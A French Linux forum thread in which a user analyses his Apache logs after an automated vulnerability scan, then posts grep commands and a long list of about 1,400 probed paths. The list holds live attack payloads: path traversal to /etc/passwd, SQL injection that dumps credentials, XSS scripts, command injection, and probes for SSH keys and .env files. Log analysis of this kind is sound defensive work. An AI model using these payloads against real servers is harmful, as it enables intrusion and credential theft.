Cyberscan
Une tiers à analysé mon serveur web
Discussions Libres
Tonin Membre non connecté
-
- Voir le profil du membre Tonin
- Inscrit le : 02/07/2013
- Groupes :
juste un partage d'expérience qui me sort de mon ordinaire : mes logs http/https révèlent le passage d'un "cyberscan.io" depuis une IP Google Cloud
whois.com/whois dit (entre autre) *** The IP addresses under this Org-ID are in use by Google Cloud customers ***
Ça a duré presque une heure et demi, pour 76959 requêtes https et 68714 http. Je n'ai rien sur le port ssh.
Coincidence, 5 min avant le début, j'avais eu la curiosité d'aller constater l'altération du résultat de la recherche Google sur "total". L'altération n'était déjà plus visible.
Cela dit, les scans de ports doivent être légions sur l'internet d'aujourd'hui.
Édité par Tonin Le 02/09/2022 à 11h19
Papoteur Membre non connecté
-
- Voir le profil du membre Papoteur
- Inscrit le : 03/10/2011
- Groupes :
-
Modérateur
-
Équipe Mageia
-
Administrateur
-
Forgeron
Qu'appelles-tu "l'altération" du résultat ?
squid-f Membre non connecté
-
- Voir le profil du membre squid-f
- Inscrit le : 03/04/2016
- Groupes :
-
Membre d'Honneur
Je comprends donc que tu as les ports 80 et 443 (voire 22?) ouverts sur l'extérieur. Quelles sont les applications qui utilisent ces ports?
Si tu as un serveur apache ou nginx, je te conseille d'activer Fail2ban avec les filtres adaptés à ton besoin.
Tu peux aussi paramétrer ton pare-feu pour qu'il bloque d'emblée les IP rapportées comme "malicieuses" :
https://wiki.mageia.org/en/Pare-feu-fr#Liste_noire_des_m.C3.A9chants_de_la_propri.C3.A9t.C3.A9_intellectuelle_signal.C3.A9s_par_la_communaut.C3.A9
A+
Tonin Membre non connecté
-
- Voir le profil du membre Tonin
- Inscrit le : 02/07/2013
- Groupes :
Papoteur :
Bonjour,
Qu'appelles-tu "l'altération" du résultat ?
Qu'appelles-tu "l'altération" du résultat ?
Pardon, je précise : l'altération c'est un résultat de recherche de "total" sur Google qui a indiqué temporairement une description détournée de l'entreprise TotalEnergies. Par exemple tel que décrit sur cet article de France Inter
Le seul rapport entre cet évènement et mon scan, c'est la recherche Google et une adresse Google Cloud qui parcourt le site. C'est peut-être tiré par les cheveux, mais de prie abord, j'ai pensé au déclenchement d'une recherche sur mon site d'un système qui aurait pu construire le détournement de description dans la recherche. L'article mentionné évoque d'autres idées qui aurait pu conduire à ce "bug de référencement"...
La parano c'est bien pour envisager le pire et s'y préparer, mais faut pas abuser non plus ! Après avoir lu l'article, je relativise déjà mon idée. Cependant, je ne sais pas ce que recherchait ce Cyberscan, peut-être plutôt une des failles répertoriée dans son catalogue (de quelques 70000 lignes...). La routine de certains pirates ? L'hébergement sur Google Cloud mérite peut-être un signalement à la plateforme pour abus.
squid-f :
Fail2ban
J'utilise apache, essentiellement pour héberger une galerie photo. Et comme le scan s'est retrouvé dans la galerie, ça a déclenché un sursaut de visites. La galerie indique refuser le passage des robots. Qui manifestement cherchaient des scripts dans les sous-répertoires... ça en fait des tiroirs à explorer !
Pour Fail2Ban, merci pour la suggestion et l'article du wiki. Je ne l'ai pas réinstallé lors de la précédente installation de Mageia... à voir.
Tonin Membre non connecté
-
- Voir le profil du membre Tonin
- Inscrit le : 02/07/2013
- Groupes :
Le catalogue de chemin à tester pourrait donc avoir eu autour des 1500 lignes.
Code BASH :
cat /var/log/httpd/ssl_request_log | grep inc/htmlarea/plugins/FileManager/standalonemanager.php | wc -l cat /var/log/httpd/ssl_request_log | grep service/index_pri.php | wc -l cat /var/log/httpd/ssl_request_log | grep zml.cgi?file=../../../../../../../../../../../../etc/passwd%00 | wc -l cat /var/log/httpd/ssl_request_log | grep webspirs.cgi?sp.nextform=../../../../../../../../../etc/passwd | wc -l # cat /var/log/httpd/ssl_request_log | grep webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;id|&CODE=PHOLD | wc -l # !!! erreur à cause du & cat /var/log/httpd/ssl_request_log | grep webcart.cgi?CONFIG=mountain | wc -l cat /var/log/httpd/ssl_request_log | grep xBoard/main.php | wc -l cat /var/log/httpd/ssl_request_log | grep xboard/main.php | wc -l cat /var/log/httpd/ssl_request_log | grep upload/index.php | wc -l
En prenant, le filtrage par l'autre bout, c'est à dire par le début du chemin exploré, il y a des chances que l'on obtienne une liste potentiellement exhaustive des fins de chemins testées :
Code BASH :
cat /var/log/httpd/ssl_request_log | grep /debut/de/chemin/ | awk '{print $7}' > cyberscan_debut-de-chemin.lst
Effectivement, sur le début de chemin testé, 2848 fins sont extraites, dédoublonnées en 1420 lignes : (j'espère que le forum n'est pas trop allourdi par ce type de message)
Caché :
_/web-inf/web.xml
_/WEB-INF/web.xml
_conf/?action=delsettings&group=..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc/passwd%2500.jpg&picdir=Sample_Gallery&what=descriptions
_head.php?_zb_path=../../../../../../../../../../etc/passwd%00
_maincfgret.cgi
_maincfgret.cgi_501377445
_maincfgret.cgi_896583524
_whatsnew.html
;/web-inf/web.xml
;/WEB-INF/web.xml
?controller=auth&action=login
?controller=user&action=login
?Mode=debug
?p=<script>alert(/xss-test/)</script>
?page=login
?page=login&action=about
?page=shop/cart&func=cartAdd&product_id='
?q=0&l=0
?upload_to=
?view=home
.//WEB-INF/web.xml
.//web-inf/web.xml
./WEB-INF/web.xml
./web-inf/web.xml
.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh
.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd
.%00/WEB-INF/web.xml
.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh
.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
.access
.bash_history
.bashrc
.bzr/branch-format
.bzr/README
.config.inc.php.backup
.config.inc.php.bak
.config.inc.php.bkp
.config.inc.php.copy
.config.inc.php.old
.config.inc.php.orig
.config.inc.php.save
.config.inc.php.swp
.config.inc.php.temp
.config.inc.php.tmp
.config.inc.php~
.config.php.backup
.config.php.bak
.config.php.bkp
.config.php.copy
.config.php.old
.config.php.orig
.config.php.save
.config.php.swp
.config.php.temp
.config.php.tmp
.config.php~
.configuration.php.backup
.configuration.php.bak
.configuration.php.bkp
.configuration.php.copy
.configuration.php.old
.configuration.php.orig
.configuration.php.save
.configuration.php.swp
.configuration.php.temp
.configuration.php.tmp
.configuration.php~
.coveralls.yml
.dbshell
.DS_Store
.env
.env_1
.env_baremetal
.env_hosted
.env_local
.env_production
.env_sample
.env_staging
.env.backup
.env.bak
.env.dev
.env.dev.local
.env.development.local
.env.example
.env.live
.env.local
.env.old
.env.prod
.env.prod.local
.env.production
.env.production.local
.env.save
.env.stage
.env.www
.esmtprc
.FBCIndex
.ftpconfig
.git-credentials
.git/config
.git/description
.git/FETCH_HEAD
.git/HEAD
.git/info/exclude
.git/info/refs
.git/logs/HEAD
.git/ORIG_HEAD
.git/sourcetreeconfig
.hg/branch
.hg/branch.cache
.hg/branchheads.cache
.hg/hgrc
.hg/last-message.txt
.hg/requires
.hg/sourcetreeconfig
.hg/undo.branch
.hg/undo.desc
.htaccess
.htpasswd
.htpasswd-all
.htpasswd-users
.htpasswds
.htuser
.htusers
.idea/WebServers.xml
.index.php.backup
.index.php.bak
.index.php.bkp
.index.php.copy
.index.php.old
.index.php.orig
.index.php.save
.index.php.swp
.index.php.temp
.index.php.tmp
.index.php~
.jsp/WEB-INF/web.xml
.jsp/web-inf/web.xml
.local
.mysql_history
.passwd
.php_cs.cache
.php-cs-fixer.cache
.production
.profile
.psql_history
.remote
.remote-sync.json
.settings.php.backup
.settings.php.bak
.settings.php.bkp
.settings.php.copy
.settings.php.old
.settings.php.orig
.settings.php.save
.settings.php.swp
.settings.php.temp
.settings.php.tmp
.settings.php~
.sh_history
.sqlite_history
.ssh/authorized_keys
.ssh/config
.ssh/id_dsa
.ssh/id_dsa.pub
.ssh/id_dss
.ssh/id_dss.pub
.ssh/id_ecdsa
.ssh/id_ecdsa.pub
.ssh/id_ed25519
.ssh/id_ed25519.pub
.ssh/id_rsa
.ssh/id_rsa.pub
.ssh/identity
.ssh/known_hosts
.svn/all-wcprops
.svn/dir-prop-base
.svn/entries
.svn/wc.db
.vscode/ftp-sync.json
.vscode/sftp.json
.wp-config.php.backup
.wp-config.php.bak
.wp-config.php.bkp
.wp-config.php.copy
.wp-config.php.old
.wp-config.php.orig
.wp-config.php.save
.wp-config.php.swp
.wp-config.php.temp
.wp-config.php.tmp
.wp-config.php~
/../WEB-INF/web.xml
/../web-inf/web.xml
/WEB-INF/web.xml
/web-inf/web.xml
#/sign-in
#browse/welcome
#welcome
%20..\\WEB-INF/web.xml
%20..\\web-inf/web.xml
%2557EB-INF/web.xml
%2e/WEB-INF/web.xml
%u002e/WEB-INF/web.xml
1.sql
111.key
111.pem
111.sql
112.key
112.pem
112.sql
113.112.111.key
113.112.111.pem
113.112.111.rev.key
113.112.111.rev.pem
113.112.111.rev.sfr.key
113.112.111.rev.sfr.net.key
113.112.111.rev.sfr.net.pem
113.112.111.rev.sfr.net.sql
113.112.111.rev.sfr.pem
113.112.111.rev.sfr.sql
113.112.111.rev.sql
113.112.111.sql
113.112.key
113.112.pem
113.112.sql
113.key
113.pem
113.sql
114.113.112.111.key
114.113.112.111.pem
114.113.112.111.rev.key
114.113.112.111.rev.pem
114.113.112.111.rev.sfr.key
114.113.112.111.rev.sfr.net.key
114.113.112.111.rev.sfr.net.pem
114.113.112.111.rev.sfr.net.sql
114.113.112.111.rev.sfr.pem
114.113.112.111.rev.sfr.sql
114.113.112.111.rev.sql
114.113.112.111.sql
114.113.112.key
114.113.112.pem
114.113.112.sql
114.113.key
114.113.pem
114.113.sql
114.key
114.pem
114.sql
404.php?url=1%3Cscript%3Ealert(%27openvasvt%27)%3C/script%3E
about
about-show.do
about.php
about/
Account/LogIn
account/login
acp/index.php
actuator/gateway/routes
add_url.htm?node=%3Cscript%3Ealert('XSS')%3C/script%3E
adframe.php?refresh=example.com'<script>alert(document.cookie)</script>
adm_program/index.php
admin
admin_area/login.php
admin_login.html
admin_panel/index.php
admin.php
admin/
admin/admin.php
admin/admin.php?sid='
admin/admin.php?sid=0'
admin/ckeditor/CHANGES.md
admin/ckeditor/ckeditor.js
admin/config.php
admin/fckeditor/_whatsnew.html
admin/fckeditor/fckeditor.js
admin/helpfiles/AdminHelp.php
admin/htmleditor/_whatsnew.html
admin/htmleditor/fckeditor.js
admin/index.php
admin/index.php?eventid=-1+union+all+select+1,0x53514c2d496e6a656374696f6e2d54657374,3,4,5,6--
admin/index.php?login
admin/install
admin/install.php
admin/lib/gradient/gradient.php?tam=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd%00
admin/libraries/ajaxfilemanager/ajax_create_folder.php
admin/login
admin/login-default.do
admin/login.html
admin/login.jsp
admin/login.php
admin/login/
admin/lost-pass.php
admin/moderation.php
admin/password_check_token.php?f_email=1&token=%22%3E%3Cscript%3Ealert%28/xss-test/%29;%3C/script%3E
admin/setup.php
admin/system
admin/welcome.php
admin#/mode
adminer.php
administration/profiles.php
aeNovo1.mdb
af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd
afdrukken.php
ag.cgi
ag.exe
agenda.php3
airflow.cfg
ajaxfilemanager/ajax_create_folder.php
ajaxp_backend.php?page=-1+union+select+1,0x53514c2d496e6a656374696f6e2d54657374,3,4,5,6,7--
alerts.php
alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd
alya.cgi
alya.cgi_1407309590
alya.cgi_831494978
andromeda.php
ang/index.php
ans.pl?p=../../../../../usr/bin/id|&blah
ans/ans.pl?p=../../../../../usr/bin/id|&blah
apc.php
apcinfo.php
apcu.php
apexec.pl?etype=odp&template=../../../../../../../../../etc/passwd%%0000.html&passurl=/category/
api/appconfiguration
api/v1/appconfiguration
api/v2/appconfiguration
api/v3/appconfiguration
apidocs/index.html
app.php
app/config.neon
app/config/config_dev.yml
app/config/config_prod.yml
app/config/config_test.yml
app/config/config.neon
app/config/config.yml
app/config/parameters.yml
app/config/security.yml
app/etc/local.xml
app/kibana
app/login.php
app/logs/dev.log
app/logs/prod.log
appconfiguration
application/configs/application.ini
application/login/login.html
applicationengine/
ApplicationEngine/
artmedic_links5/index.php?id=index.php
assets/plugins/mp3_id/mp3_id.php
athenareg.php?pass=%20;id
auth/login
authentication_index.php?PGV_BASE_DIRECTORY=http://xxxxxxx/
authentication/login
awstats.pl?framename=mainright
awstatstotals.php
axis2-admin/
axis2-web/index.jsp
backend.php
backend/plugin/Registration/index.php
backend/start/index.php
backup.sql
base/index.php
basilix.php?is_ssl=1
bb_admin.php
bb_func_txt.php?pathToFiles=/etc/passwd%00
beerxml.php?r=null%20union%20select%201,2,3,4,5,0x53514c2d496e6a656374696f6e2d54657374,7,8,9,10,11
beta/index.html
bible.php
bin/index.php
bin/view/foswiki/WebHome
bin/view/TWiki/WebHome
bizdb1-search.cgi
bizdb1-search.cgi_109672035
bizdb1-search.cgi_690592069
blob.php
blogAdmin/jobs.php?j=login&p=1%27or%271&%27=1
blogs/admin.php
board.php?FID=%3Cscript%3Efoo%3C/script%3E
breakcal/calendar.cgi
browse.php?pk=-1%20union%20select%201234567,2--
cachemgr.cgi
cachemgr.cgi_1726251222
cachemgr.cgi_1731356644
cal_week.php?op=week&catview=999'
calendar_scheduler.php?start=\"><script>alert(document.cookie)</script>
calendar.php
calendar.php?year=2004&month=<script>foo</script>&day=01
cart.php
catalog.php?action=category_show&id='
category.php
cb_install/
cbag/ag.cgi
cbag/ag.exe
cbdb/db.exe
cbgrn/grn.exe
cbmw/mw.exe
centreon/install/setup.php
CFIDE/probe.cfm
ma.dyn.key
ma.dyn.ip.key
ma.dyn.ip.pem
ma.dyn.ip.sql
ma.dyn.pem
ma.dyn.sql
ma.key
ma.pem
ma.sql
cgi-bin/cbag/ag.cgi
cgi-bin/cbag/ag.exe
cgi-bin/config.cgi
cgi-bin/view/TWiki/WebHome
cgi.rb
cgi.rb_2069471998
cgi.rb_2072024709
cgi/tseekdir.cgi?location=/etc/passwd%00
cgicso?query=<script>alert('foo')</script>
cgicso?query=AAA
cgiwrap
cgiwrap_1388905770
cgiwrap_807985736
ChangeLog
CHANGELOG
changelog
changelog.txt
CHANGES
CHANGES.md
charts.php
chat/send.php?css=%3cscript%3ealert(openvasvt480265941)%3c%2fscript%3e
check_mk/login.py
check_user_id.php?user_id=<script>foo</script>
chgpwd.php
chklogin.cgi
chksession.cgi
city.php
ckeditor.js
ckeditor/CHANGES.md
ckeditor/ckeditor.js
classifieds/Site_Admin/admin.php
clientscript/ckeditor/CHANGES.md
clientscript/ckeditor/ckeditor.js
clientscript/fckeditor/_whatsnew.html
clientscript/fckeditor/fckeditor.js
clwarn.cgi
cm/newui/wiki/index.jsp
cms/website.php?id=/de/index.htm&admin=login
comment.php?id=-1%27%20UNION%20ALL%20SELECT%20NULL,0x53514c2d496e6a656374696f6e2d54657374,3,4%20FROM%20cblog_users%23
comments.php?image_id=1'
comments.php?y=05&m=01&entry=../../../../../../../etc/passwd
common/login.php?default_language=/../../supporter/timer.js%00
complete-modules/modules/forcedownload/force_download.php
composer.json
composer.json-dist
composer.json.dist
composer.lock
config-browser/index
config-browser/index.action
config.development.json
config.inc.php.backup
config.inc.php.bak
config.inc.php.bkp
config.inc.php.copy
config.inc.php.old
config.inc.php.orig
config.inc.php.save
config.inc.php.swp
config.inc.php.temp
config.inc.php.tmp
config.inc.php~
config.neon
config.php.backup
config.php.bak
config.php.bkp
config.php.copy
config.php.old
config.php.orig
config.php.save
config.php.swp
config.php.temp
config.php.tmp
config.php~
config.production.json
config.xml.sav
config/database.yml
config/databases.yml
Config/diff.php?file=;id&new=1&old=2
config/packages/security.yaml
configs/application.ini
configuration.php.backup
configuration.php.bak
configuration.php.bkp
configuration.php.copy
configuration.php.old
configuration.php.orig
configuration.php.save
configuration.php.swp
configuration.php.temp
configuration.php.tmp
configuration.php~
contao/install
contao/install.php
content.html
content.php
content.php?get_action=display_doc&doc_file=CREDITS
control/main
control/uk/publish/category
core/config/databases.yml
core/editor.php?editor_insert_bottom=/etc/passwd
core/includes/gfw_smarty.php
Count.cgi?align=topcenter
cvs.php
CVS/Entries
CVS/Root
cvsweb.cgi/
data.sql
data/adminusers.csv
data/nanoadmin.php
database.sql
database/_sessions/
databases.yml
dataface_info.php
db_backup.sql
db.exe
db.sql
db/budget.sqlite
db/users.dat
dbdump.sql
dcshop.cgi
dcshop.cgi_483182820
dcshop.cgi_5518369
dcshop.pl
dcshop.pl_1463499405
dcshop.pl_1627197598
dyn.key
dyn.ip.key
dyn.ip.pem
dyn.ip.sql
dyn.pem
dyn.sql
DEADJOE
Default.aspx
default.cfm?Mode=debug
default.cfml?Mode=debug
deployment-config.json
desktop.php
details_view.php?event_id=1&date=2000-12-01&view=month&loc=loc1&page_info_message=<script>alert(/xss-test/)</script>
dezie/db.exe
dig.php?ns=||cat%20/etc/passwd&host=example.org&query_type=NS&status=digging
directory.php?dir=%3Bcat%20/etc/passwd
display.php?filename=<script>alert('openvasvt')</script>
do/view/TWiki/WebHome
doc/catalogue.html
doc/index.html
docbuilder/top.php
docs/distribution/tour_page1.htm
docs/docs/guides.html
docs/docs/home.html
docs/docs/index.html
docs/docs/struts2-core-apidocs/help-doc.html
docs/docs/struts2-core-apidocs/index-all.html
docs/docs/struts2-core-apidocs/overview-summary.html
docs/docs/WW/cwiki.apache.org/WW/guides.html
docs/docs/WW/cwiki.apache.org/WW/home.html
docs/guides.html
docs/home.html
docs/index.html
docs/readme.txt
docs/struts2-core-apidocs/help-doc.html
docs/struts2-core-apidocs/index-all.html
docs/struts2-core-apidocs/overview-summary.html
docs/WW/cwiki.apache.org/WW/guides.html
docs/WW/cwiki.apache.org/WW/home.html
doesnt_exist/
doku.php
domcfg.nsf
down.php
download_file.php
download.php
download.php?file=etc/passwd
downloader/
downloadfile.php
downlot.php?file=../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
dsweb/HomePage
dump.sql
e107_admin/admin.php
easymsgb.pl?print=|id|
edit_image.php?dn=1&userfile=/etc/passwd&userfile_name=%20;id;%20
editor.php
editor/_whatsnew.html
editor/CHANGES.md
editor/ckeditor.js
editor/fckeditor.js
edlink.php?linkid=-1%27%20union%20all%20select%201,2,3,4,0x53514c2d496e6a656374696f6e2d54657374%27--
elfinder.html
email.php?forum_contact=\"><script>foo</script>
EmployeeSearch.cc
en/index.html
en/neoclassic/login/login
en/StartingPoints
engine/inc/version.info
engine/preview.php
env.111
env.112
env.113
env.113.112
env.113.112.111
env.113.112.111.rev
env.113.112.111.rev.sfr
env.113.112.111.rev.sfr.net
env.114
env.114.113
env.114.113.112
env.114.113.112.111
env.114.113.112.111.rev
env.114.113.112.111.rev.sfr
env.114.113.112.111.rev.sfr.net
env.ma
env.ma.dyn
env.ma.dyn.ip
env.dyn
env.dyn.ip
env.ip
env.ip.dyn
env.ip.dyn.ma
env.net
env.net.sfr
env.net.sfr.rev
env.net.sfr.rev.111
env.net.sfr.rev.111.112
env.net.sfr.rev.111.112.113
env.net.sfr.rev.111.112.113.114
env.rev
env.sfr
error.php?err=404
error500.html
eshop.pl/seite=;cat%20eshop.pl|
ess.do
etc/users.gdb
evalsmsi.php
evoadm.php
example/HelloWorld.action
example/upload.php
extensions/FCKeditor/_whatsnew.html
extensions/FCKeditor/fckeditor.js
extensions/FCKeditor/fckeditor/_whatsnew.html
extensions/FCKeditor/fckeditor/fckeditor.js
extplorer.xml
extra/image.php
extras
farcry/core/webtop/install/index.cfm
favicon.ico
fckeditor.js
fckeditor/_whatsnew.html
FCKeditor/_whatsnew.html
fckeditor/fckeditor.js
FCKeditor/fckeditor.js
feed.php
feed/
FileZilla.xml
filezilla.xml
filter.php?dbtable=Accounts&dbfield=Password
firstvisit.php
flsummary.pl
fm.php
fom.cgi?cmd=<script>foo</script>&file=1&keywords=vt-test
FormMail.cgi
formmail.pl
FormMail.pl
formmail.pl.cgi
forms/login.fcc
forum_2.php?msg=10&return=<script>foo</script>
forum_answer.php
forum.php?forum=-1%20UNION%20SELECT%20null%2c123456%2cnull%2cnull%2cnull%2cnull%2f*
front_content.php
frontend/frontend.nocache.js
frontend/js.php?module=../../../../../../../../../../../../../../../../../../etc/passwd%00&file=frontend.js&language=en
frontend/nagvis-js/index.php
ftpsync.settings
functionRouter
gadgets/Blog/BlogModel.php?path=/etc/passwd%00
gallery.php
garoon/grn.exe
general/login.php
get_flash_info.php?ver=1'
get_status.cgi
global_settings.py
gm.cgi
gnat/admin/index.php
grn.exe
grn/grn.exe
guestbook.cgi
guestbook.cgi_1235714721
guestbook.cgi_1823016532
guestbook.php
guestbook.pl
guestbook.pl_1049307391
guestbook.pl_1437438317
guides.html
GW5/GWWEB.EXE?GET-CONTEXT&HTMLVER=AAA
GW5/GWWEB.EXE?HELP=bad-request
GWWEB.EXE?GET-CONTEXT&HTMLVER=AAA
GWWEB.EXE?HELP=bad-request
help.html
help.php
help/copyright.html
help/index.html
help/index.php
hints.pl?|id|
home.cfm?Mode=debug
home.cfml?Mode=debug
home.html
home.php
home/+login
home/index.php
HomePage
horde/services/help/?module=chora&show=about
hosting/discovery
hotspotlogin.cgi?res=failed&reply=1
htaccess.txt
htdocs/index.php
htdocs/login.php
html/admin.php
html/affich.php?base=http://xxx.xxxxxx./
html/index.php
html/infoen.htm
html/portal/login.jsp
HTMLEditor/_whatsnew.html
HTMLEditor/fckeditor.js
htsearch?config=vt-test&restrict=&exclude=&method=and&format=builtin-long&sort=score&words=
htsearch.cgi?words=%22%3E%3Cscript%3Efoo%3C%2Fscript%3E
i-mall.cgi?p=|id|
i.php
ibillpm.pl
ibillpm.pl_288361805
ibillpm.pl_486256335
IBSng/util/show_multistr.php
id_dsa
id_dss
id_ecdsa
id_ed25519
id_rsa
identity/login/shell/sitecoreidentityserver
ikiwiki/
inc/fckeditor/_whatsnew.html
inc/fckeditor/fckeditor.js
inc/htmlarea/plugins/FileManager/standalonemanager.php
include/fckeditor/_whatsnew.html
include/fckeditor/fckeditor.js
includer.cgi?template=vt-test
includes/esqueletos/skel_null.php
includes/fckeditor/_whatsnew.html
includes/fckeditor/fckeditor.js
includes/include.php
includes/js/mambojavascript.js
includes/tiny_mce/plugins/filemanager/classes/FileManager/FileSystems/ZipFileImpl.php
includes/tiny_mce/plugins/imagemanager/config.php
includes/window_top.php
indeks.php?db=frontpage
index
index_en.jsp
index.action
index.cfm
index.cfm?Mode=debug
index.cfml?Mode=debug
index.cgi
index.do
index.htm
index.html
index.js%70
index.jsp
index.php
index.php?_a=knowledgebase&_j=search&searchm=<script>alert(document.cookie)</script>
index.php?act=Arcade&do=stats&gameid=1'
index.php?act=publ&id=-3+UNION+SELECT+1,2,3,4,0x53514c2d496e6a656374696f6e2d54657374
index.php?action=login
index.php?action=login.index&host=0
index.php?action=Login&module=Users&login_module=Home&login_action=index
index.php?c=access&a=login
index.php?cmd=search&keywords=\"><script>alert(document.cookie);</script>
index.php?controller=login&action=showlogin
index.php?err=3&email=<script>foo</script>
index.php?error=<script>foo</script>
index.php?file=Liens&op=\"><script>window.alert('test');</script>
index.php?function=add_kom&no=<script>foo</script>
index.php?function=show_all&no=%253cscript>foo%253c/script>
index.php?gadget=Glossary&action=view&term=%3cscript%3ealert('openvasvt166634723')%3b%3c%2fscript%3e
index.php?gadget=Glossary&action=ViewTerm&term=%3cscript%3ealert('openvasvt166634723')%3b%3c%2fscript%3e
index.php?get_action=get_boot_conf
index.php?id=ke0zdxqyik'
index.php?id=vh282t3hk2'
index.php?ip=;/bin/cat%20/etc/passwd
index.php?m=recipes&a=search&search=yes&base_id=5+union+all+select+1,2,+0x53514c2d496e6a656374696f6e2d54657374,4,5,6,7+from+security_users--
index.php?mod=home&act=about
index.php?mode=administration
index.php?module=site&show=home
index.php?module=users&action=user&command=login_page
index.php?module=Users&parent=Settings&view=SystemSetup
index.php?n=guest&c=0&m=search&s=forum&wert=-1%25%22%20UNION%20ALL%20SELECT%201,2,3,4,CONCAT(nick,%200x3a,%20pwd),6%20FROM%20com_users%23
index.php?OPT_Session=VT_Req
index.php?option=com_joomradio&page=show_video&id=-1%20UNION%20SELECT%20user%28%29,concat%28username,0x3a,password%29,user%28%29,user%28%29,user%28%29,user%28%29,user%28%29%20FROM%20jos_users--
index.php?owa_do=base.loginForm
index.php?p='vt-test
index.php?page=../../../../../../../../../../../etc/passwd%00
index.php?page=/etc/passwd%00
index.php?page=http://xxxxxxxxxxxxx/vt-test
index.php?page=rss.php%00
index.php?page=start
index.php?path=<script>malicious_code</script>
index.php?s=blog&m=permalink&x=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
index.php?search=%3cscript%3ealert('openvasvt1424677842')%3b%3c%2fscript%3e&function=search
index.php?section=<script>alert(document.cookie)</script>&action=login
index.php?seite=0
index.php?setLang=vuln-test&lang[vuln-test][file]=../../../../../../../../../../../../etc/passwd
index.php?system=../../../../../../../../../etc/passwd%00
index.php?x=admin
index.php.backup
index.php.bak
index.php.bkp
index.php.copy
index.php.old
index.php.orig
index.php.save
index.php.swp
index.php.temp
index.php.tmp
index.php/admin
index.php/index/install
index.php/install/
index.php/login
index.php/Main_Page
index.php/nette.micro/?callback=shell_exec&cmd=id&what=-1
index.php/s/login
index.php/Special:Version
index.php~
index.php3
index.php4
index.pl
index.pl/homels?func=add;class=WebGUI::Asset::Wobject::Article%3bprint%20%60id%60;
index.rb
Index2.php
index2.php?_SERVER[]=&_SERVER[REMOTE_ADDR]='.system('id').exit().'&option=wrapper&module[module]=1
info.php
innoedit.cgi?download=;id|
inserter.cgi?/etc/passwd
Install
install.php
install/
install/index.php
Install/InstallWizard.aspx
install/make-config.php
install/system-compatibility
installation/default.asp
installation/index.php
installer-backup.php
installer.php
installer.pl
interface/login/login.php
interface/logon.do
intro.php
ion-p?page=../../../../../etc/passwd
irc.cgi
jaws/index.php
jobdetails.php?jobid=-5%20union%20select%2012345678987654321,2,3,4,5,6,concat(admin,0x23,email,0x5D,loginname,0x7E,pass),8,9,0,1,2,3,4,5,6,7,8,9,0%20from%20users--
journal.php?id='
jQuery-File-Upload/example/upload.php
jQuery-File-Upload/php/index.php
jQuery-File-Upload/server/php/upload.class.php
jQuery-File-Upload/server/php/UploadHandler.php
jsonrpc.php
jsp/fw/internal/Login.jsp
key.pem
kommentar.php?filecat=\"><script>alert(/xss-test/)</script>&fileid=0
language/en/text.php/<script>alert('openvasvt');</script>
left.php
lib/
lib/browsefiles.php?dir=/etc
lib/browsefolders.php?dir=/etc
lib/CHANGES
lib/composer.json
lib/README
lib/version.phps
library/lib.menu.php
libs/smarty_ajax/index.php?_=&f=update_intro&page=../../../../../../../../../../../../../../../../../../etc/passwd%00
license.php
license.txt
LightNEasy.php?do=login
Lisez%20moi.txt
listinfo
listinfo.cgi
listinfo.py
listing.php
listrec.pl?APP=qmh-news&TEMPLATE=;ls%20/etc|
lists/admin/?page=about
LiveTime/WebObjects/LiveTime.woa
loader-wizard.php?page=phpinfo
local.properties
localhost.sql
login
Login
login_page.php
login.action
Login.aspx
login.cgi
login.cgi?username=&command=simple&do=edit&password=&file=|id|
Login.do
login.htm
login.html
login.jsp
Login.jsp
login.php
Login.php
login.php?login=<script>foo</script>
login.php?ref='%3e%3cscript%3ealert(openvasvt307971467)%3c%2fscript%3e
login.php?url=index.php%3F
login.pl
login.rol
login.wdm
login/
login/auth
login/index.php
login/login.nocache.js
login/login.php
LoginPage.do
mail.cgi
mailwise/mw.exe
main.html
main.php
Main/WebHome
manager/index.php
manifest.json
manpage/index.php?command=/etc/passwd
medialist.php
menu.jsp
message.php?skin=\"><script>alert(/openvasvt/)</script>
metadot/index.pl?isa=Session&op=auto_login&new_user=&key='[foo]
mj_wwwusr
mlog.html?screen=/etc/passwd
moadmin.php?db=admin&action=listRows&collection=fdsa&find=array();phpinfo();
module.php?link=http://xxxx./index.php
module.php?mod=<script>alert(8154711)</script>
module.php?module=osTicket&file=/../../../../../../../../../../../etc/passwd
module.php/core/frontpage_welcome.php
module/biz/index.php
module/forum/main.php
modules.php?modload=Albums&op=photo&id=-1+UNION+SELECT+1,2,3,0x53514c2d496e6a656374696f6e2d54657374%20--
modules.php?name=gallery&files=foobar
modules/fckeditor/_whatsnew.html
modules/fckeditor/fckeditor.js
modules/module_db.php?pivot_path=http://xxxxxxxxxx/
modules/news/index.php
modules/plain/adminpart/addplain.php?module=../../../../../../../../../../../../etc/passwd%00
modules/plain/adminpart/addplain.php?module=../../../javascript/sniffer.js%00
modules/profile/user.php?aXconf[default_language]=../../../../../../../../../../../../../../../../../../etc/passwd%00
modules/Submit/index.php?op=pre&title=<script>window.alert(document.cookie);</script>
mrtg.cgi?cfg=/../../../../../../../../../etc/passwd
ip.dyn.ma.key
ip.dyn.ma.pem
ip.dyn.ma.sql
ip.dyn.key
ip.dyn.pem
ip.dyn.sql
ip.key
ip.pem
ip.sql
mt.cgi
mw.exe
myevent.php
mylog.html?screen=/etc/passwd
myserver.key
mysql.sql
mysqldump.sql
nameko.php
napro4/index.php
nbmember.cgi?cmd=test
net.key
net.pem
net.sfr.key
net.sfr.pem
net.sfr.rev.111.112.113.114.key
net.sfr.rev.111.112.113.114.pem
net.sfr.rev.111.112.113.114.sql
net.sfr.rev.111.112.113.key
net.sfr.rev.111.112.113.pem
